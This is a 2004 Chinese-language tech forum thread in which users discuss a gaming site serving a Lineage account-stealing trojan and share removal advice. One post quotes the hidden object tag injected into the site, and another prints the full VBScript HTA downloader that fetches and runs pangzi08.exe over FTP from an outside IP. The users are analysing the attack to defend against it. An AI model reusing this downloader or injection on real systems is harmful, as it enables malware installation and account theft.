PCDVD數位科技討論區
PCDVD數位科技討論區   註冊 常見問題 標記討論區為已讀

回到   PCDVD數位科技討論區 > 其他群組 > 疑難雜症區
重新載入此頁 Connect 通訊者天堂...又是病毒
帳戶
密碼
 

 
第1頁 共2頁 1 2 下一頁
回應
 
主題工具
壹伍貳參
*停權中*
 
壹伍貳參的大頭照
 

加入日期: Dec 2003
文章: 391
Connect 通訊者天堂...又是病毒
Connect 通訊者天堂
http://www.oc-connect.com/


掃描類型: 即時防護掃描
事件: 發現病毒!
病毒名稱:PWSteal.Trojan
檔案: C:\pangzi08.exe
位置: 隔離所
電腦: ****
使用者: ****
採取的動作: 清除 失敗 : 隔離 成功 : 拒絕存取
發現日期: Thu Aug 10 11:33:32 2000
     
      
此文章於 2004-08-14 03:41 AM 被 壹伍貳參 編輯.
舊 2004-08-14, 03:38 AM #1
回應時引用此文章
壹伍貳參離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
首頁原始碼最下面有一行這個

代碼:
<object data="http://zhu.7xi.org/pangzi08/ng.test" weight=0 width=0></object>
 
舊 2004-08-14, 04:24 AM #2
回應時引用此文章
darksnow離線中  
water_luh
Junior Member
 

加入日期: May 2004
文章: 776
咦?
我的NIS2003(含NAV)沒反應耶....

還有,樓主的檔案為啥位於C碟下?
舊 2004-08-14, 04:27 AM #3
回應時引用此文章
water_luh離線中  
壹伍貳參
*停權中*
 
壹伍貳參的大頭照
 

加入日期: Dec 2003
文章: 391
引用:
作者darksnow
首頁原始碼最下面有一行這個


<object data="http://zhu.7xi.org/pangzi08/ng.test" weight=0 width=0></object>


那檔會連接到那
舊 2004-08-14, 06:35 AM #4
回應時引用此文章
壹伍貳參離線中  
特地來找你
*停權中*
 
特地來找你的大頭照
 

加入日期: Jul 2004
您的住址: 東京
文章: 127
引用:
作者water_luh
咦?
我的NIS2003(含NAV)沒反應耶....

還有,樓主的檔案為啥位於C碟下?



這是木馬程式,屬於強制植入性質.... 專門盜取天堂帳號用的木馬! 自動執行後,會在c:\根

目錄下產生"pangzi08.exe"---> 刪除即可,在c:\windows下有個"Smcsvr.exe",必須

重新開機再手動刪除.....!

之前"超頻者天堂","遊戲基地","電玩勁檔中心"等國內大型討論區網站,都曾是受害網站~

經小弟追查來源...

這大陸網址位於安徽省合肥市附近.....國內報章已經刊登過幾次天堂帳號被盜的事件,

應該都出於此作者之手....但天高皇帝遠,台灣方面目前也拿他沒輒! 小弟是不玩天堂啦!

隨時檢查自己的電腦狀況,留意上網網站的異狀,是比較保險的做法~~
舊 2004-08-14, 06:45 AM #5
回應時引用此文章
特地來找你離線中  
zoodong
Major Member
 

加入日期: Apr 2004
文章: 159
我的卡巴斯基沒反應
該網站原始碼也沒大大講的內容耶

有人要去試試嗎?
(上次oc的卡巴有抓到)
舊 2004-08-14, 08:11 AM #6
回應時引用此文章
zoodong離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
引用:
作者darksnow
首頁原始碼最下面有一行這個


<object data="http://zhu.7xi.org/pangzi08/ng.test" weight=0 width=0></object>



ng.test的內容

代碼:

<HTA:APPLICATION  caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("new")
t.WriteLine("new")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get pangzi08.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\pangzi08.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>




我猜會不會是利用某版IE的hole來搞的?
有跑windowsupdate更新到最新的就不會有事,也不會下載那個執行檔,所以防毒軟體就不會偵測到?
此文章於 2004-08-14 08:50 AM 被 darksnow 編輯.
舊 2004-08-14, 08:36 AM #7
回應時引用此文章
darksnow離線中  
boatswain
Major Member
 

加入日期: Aug 2001
您的住址: 外太空
文章: 192
看到這篇不知道該哭還是該笑........天堂..............死xx(指那些專門盜取天堂帳號),謝謝上面幾位大大的留言~~讓我警戒心又提高了^^
舊 2004-08-14, 11:40 AM #8
回應時引用此文章
boatswain離線中  
water_luh
Junior Member
 

加入日期: May 2004
文章: 776
引用:
作者特地來找你
這是木馬程式,屬於強制植入性質.... 專門盜取天堂帳號用的木馬! 自動執行後,會在c:\根

目錄下產生"pangzi08.exe"---> 刪除即可,在c:\windows下有個"Smcsvr.exe",必須

重新開機再手動刪除.....!
~~~~~


感謝說明!

兩個檔案都沒發現......
舊 2004-08-14, 02:57 PM #9
回應時引用此文章
water_luh離線中  
evo2001
Advance Member
 
evo2001的大頭照
 

加入日期: Aug 2004
文章: 305
之前我家的諾頓有抓到並刪除

我也是因為這原因才把趨勢換掉的
舊 2004-08-14, 03:17 PM #10
回應時引用此文章
evo2001離線中  


 
第1頁 共2頁 1 2 下一頁
  回應

« 上一主題 | 下一主題 »

POPIN
主題工具

發表文章規則
不可以發起新主題
不可以回應主題
不可以上傳附加檔案
不可以編輯您的文章
vB 代碼打開
[IMG]代碼打開
HTML代碼關閉



所有的時間均為GMT +8。 現在的時間是03:38 PM.

聯絡我們 - PCDVD數位科技討論區 - 回到頂端

vBulletin Version 3.0.1
powered_by_vbulletin 2025。